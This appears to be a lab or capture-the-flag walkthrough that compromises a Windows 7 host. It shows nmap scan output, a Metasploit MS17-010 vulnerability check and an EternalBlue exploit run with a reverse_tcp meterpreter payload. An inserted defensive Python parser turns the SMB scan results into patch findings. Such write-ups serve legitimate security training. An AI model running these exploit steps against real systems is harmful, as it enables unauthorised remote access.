Phase 1: Recon

Phase 2: Scanning

nmap -A -T4
Nmap scan report for
Host is up (0.075s latency).
Not shown: 65526 closed ports
microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -18m05s, deviation: 34m36s, median: 1m52s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-05-08T23:05:29+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-08T22:05:28
|_ start_date: 2020-05-08T22:02:01
TRACEROUTE (using port 993/tcp)
1 75.10 ms
2 75.33 ms
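As an added defender-side example (not part of the original write-up): a small Python parser for the nmap host-script output above that extracts the smb-os-discovery, smb-security-mode and smb2-security-mode fields and turns them into patch-priority findings. The sample input is constructed from the scan in this write-up; the risk rules are the example's own, not nmap's.

```python
"""Triage nmap host-script output for SMB exposure indicators.

Added example, not code from the original write-up. It parses the
`| script-name:` blocks nmap prints under "Host script results:" and
derives defender-side findings (legacy OS, SMB signing not enforced,
guest SMB access) that tell an administrator what to verify and fix.
"""
import re

# Constructed sample: the host-script section of the scan in this write-up.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
|_clock-skew: mean: -18m05s, deviation: 34m36s, median: 1m52s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\\x00
|   Workgroup: WORKGROUP\\x00
|_  System time: 2020-05-08T23:05:29+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# "| script-name:" or "|_script-name:" with nothing after the colon.
_SCRIPT_HEADER = re.compile(r"^\|_?\s*([a-z0-9-]+):\s*$")
# "|   key: value" lines inside a script block.
_KEY_VALUE = re.compile(r"^\|_?\s*([^:]+?):\s*(.*)$")


def parse_host_scripts(text):
    """Return {script_name: {key: value, "notes": [...]}} per NSE script block."""
    scripts = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.startswith("|"):
            current = None          # left the tree output
            continue
        header = _SCRIPT_HEADER.match(line)
        if header:
            current = header.group(1)
            scripts[current] = {}
            continue
        if current is None:
            continue                # one-line scripts such as clock-skew
        kv = _KEY_VALUE.match(line)
        if kv:
            scripts[current][kv.group(1).strip()] = kv.group(2).strip()
        else:
            # Free-text lines (e.g. the smb2 signing statement) have no colon.
            scripts[current].setdefault("notes", []).append(line.lstrip("|_ ").strip())
    return scripts


def assess_smb_exposure(scripts):
    """Derive findings to act on. Rules are this example's own heuristics."""
    findings = []
    os_name = scripts.get("smb-os-discovery", {}).get("OS", "")
    smb1 = scripts.get("smb-security-mode", {})
    smb2_notes = " ".join(scripts.get("smb2-security-mode", {}).get("notes", []))

    if "Windows 7" in os_name:
        findings.append("legacy-os: confirm MS17-010 patch level and disable SMBv1")
    if smb1.get("message_signing", "").startswith("disabled"):
        findings.append("smb1-signing-disabled: SMBv1 reachable without message signing")
    if smb1.get("account_used") == "guest":
        findings.append("guest-smb-access: guest/anonymous SMB session was accepted")
    if "not required" in smb2_notes:
        findings.append("smb2-signing-optional: require SMB signing via group policy")
    return findings


if __name__ == "__main__":
    parsed = parse_host_scripts(SAMPLE_NMAP_OUTPUT)
    for finding in assess_smb_exposure(parsed):
        print(finding)
```

Run against the full `nmap -A` text of a scan, the same two functions give a per-host list of what to check before treating the host as patched; the smb2 block is read from its free-text line because nmap prints that statement without a key.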

Phase 3: Exploitation

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] - Host is likely VULNERABLE to MS17-010! -
[*] - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

Phase 4: Gaining Access/Maintaining access

cd       - Change directory
download - Download a file or directory
upload   - Upload a file or directory
getuid   - Get the user that the server is running as
sysinfo  - Gets information about the remote system, such as OS
shell    - Drop into a system command shell

Phase 5: Covering tracks

meterpreter > exit
[*] Shutting down Meterpreter...
[*] - Meterpreter session 2 closed. Reason: User exit
msf5 exploit(windows/smb/ms17_010_eternalblue) >